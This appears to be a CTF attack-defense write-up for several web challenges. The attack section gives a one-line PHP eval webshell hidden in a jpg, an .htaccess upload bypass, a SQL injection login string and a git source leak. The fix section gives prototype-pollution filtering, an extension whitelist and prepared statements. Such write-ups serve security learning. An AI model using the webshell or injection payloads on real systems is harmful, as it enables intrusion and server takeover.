BREAK
simple_upload
Captured the request and modified it.
The upload failed.
The server is Apache, so the idea is to use .htaccess to change how the file is handled, and put the shell inside a jpg.
Uploaded the shell as 1.jpg:
<?php eval($_POST("cmd"))?>
Connected with AntSword, used a plugin to bypass disable_function, called /readflag, and got the flag.
baselogic
Looking at the request headers, a cookie is handed out.
Visiting dwdwgadag.html lets you log in as the aaa account.
Guessed SQL injection and tried the universal password 1' or 1='1
Got the flag.
welcome
F12.
leakleak
On visiting, the page source (F12) shows a hint about .git.
Git source leak; restored it with GitHack. In the history versions,
found find_me.php: an eval with character restrictions.
FIX
CyberHunter
Filter keywords such as __proto__, constructor and "prototype" to prevent prototype chain pollution:

// Recursively delete any key that could reach the prototype chain
function cleanObject(obj) {
    for (const prop in obj) {
        if (prop === '__proto__' || prop === 'constructor' || prop === 'prototype') {
            delete obj[prop];
        } else if (typeof obj[prop] === 'object') {
            cleanObject(obj[prop]);
        }
    }
}

// Parse untrusted JSON and sanitize it before it is used anywhere
function parseObject(str) {
    let obj = JSON.parse(str);
    cleanObject(obj);
    return obj;
}

cleanObject(req.body)
const { username, password } = req.body
let user = {
    username: parseObject(username),
    password: parseObject(password),
    auth: "GenshinImpact"
}
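To check that the key filter above actually stops a merge from reaching Object.prototype, here is an added stand-alone harness (example code, not the challenge's own): the same filtering idea, an assumed typical recursive merge() as the sink, and a constructed JSON sample that tries both the direct __proto__ route and the nested constructor.prototype route.

```javascript
// Added example, not the challenge's own code: the CyberHunter key filter wrapped
// in a small harness so it can be exercised offline. merge() is an assumed,
// typical recursive merge, i.e. the kind of sink prototype pollution needs;
// SAMPLE is a constructed input.
const DANGEROUS = new Set(['__proto__', 'constructor', 'prototype']);

// Recursively strip keys that could reach Object.prototype through a merge.
// Mutates in place and returns the same object for convenience.
function cleanObject(obj) {
  if (obj === null || typeof obj !== 'object') return obj;
  for (const prop of Object.keys(obj)) {
    if (DANGEROUS.has(prop)) {
      delete obj[prop];
    } else if (typeof obj[prop] === 'object') {
      cleanObject(obj[prop]); // arrays are objects too, so they are walked as well
    }
  }
  return obj;
}

// Parse untrusted JSON and sanitize it before anything merges it.
function parseObject(str) {
  return cleanObject(JSON.parse(str));
}

// Typical deep merge: copies source keys into target, recursing on nested objects.
// With an unsanitized "__proto__" key, target["__proto__"] is Object.prototype
// and the recursion would write into it; that is the bug the filter prevents.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (val !== null && typeof val === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      merge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Merge a sanitized document into a fresh object and report whether an unrelated
// fresh object picked up "auth", i.e. whether Object.prototype got polluted.
function mergeAndCheck(json) {
  const merged = merge({}, parseObject(json));
  const polluted = ({}).auth !== undefined;
  return { merged, polluted };
}

// Constructed sample: direct __proto__ route plus nested constructor.prototype route.
const SAMPLE = '{"username":"alice","__proto__":{"auth":"admin"},' +
               '"profile":{"constructor":{"prototype":{"auth":"admin"}}}}';
```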
simple_upload
Change the blacklist to a whitelist:
// Whitelist: only these extensions pass ($ext is assumed to hold the file extension; the original line omitted the subject argument)
if(!preg_match("/^(jpg|jpeg|png|gif)$/i", $ext))
leakleak
Remove the backdoor and the .git leak.
baselogic
Fix the SQL injection with prepared statements:

// Check whether the user exists
$checkEmailSql = $conn->prepare("SELECT * FROM users WHERE username=?");
$checkEmailSql->bind_param("s", $username);
$checkEmailSql->execute();
$checkResult = $checkEmailSql->get_result();

// Store (or replace) the password reset token for that user
$insertTokenSql = $conn->prepare("REPLACE INTO password_reset_tokens (username, token) VALUES (?, ?)");
$insertTokenSql->bind_param("ss", $username, $token);
$insertTokenSql->execute();

// Login check
$sql = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
$sql->bind_param("ss", $username, $password);
$sql->execute();
$result = $sql->get_result();

// Verify that the reset token belongs to the user
$checkTokenSql = $conn->prepare("SELECT * FROM password_reset_tokens WHERE token=? AND username=?");
$checkTokenSql->bind_param("ss", $token, $user);
$checkTokenSql->execute();
$checkResult = $checkTokenSql->get_result();

// Update the password
$updatePasswordSql = $conn->prepare("UPDATE users SET password=? WHERE username=?");
$updatePasswordSql->bind_param("ss", $newPassword, $user);
$updatePasswordSql->execute();

// Invalidate the used token
$deleteTokenSql = $conn->prepare("DELETE FROM password_reset_tokens WHERE token=?");
$deleteTokenSql->bind_param("s", $token);
$deleteTokenSql->execute();
Fix the logic flaw by generating the reset token from a cryptographically secure random source:
$token = base64_encode(bin2hex(random_bytes(5)));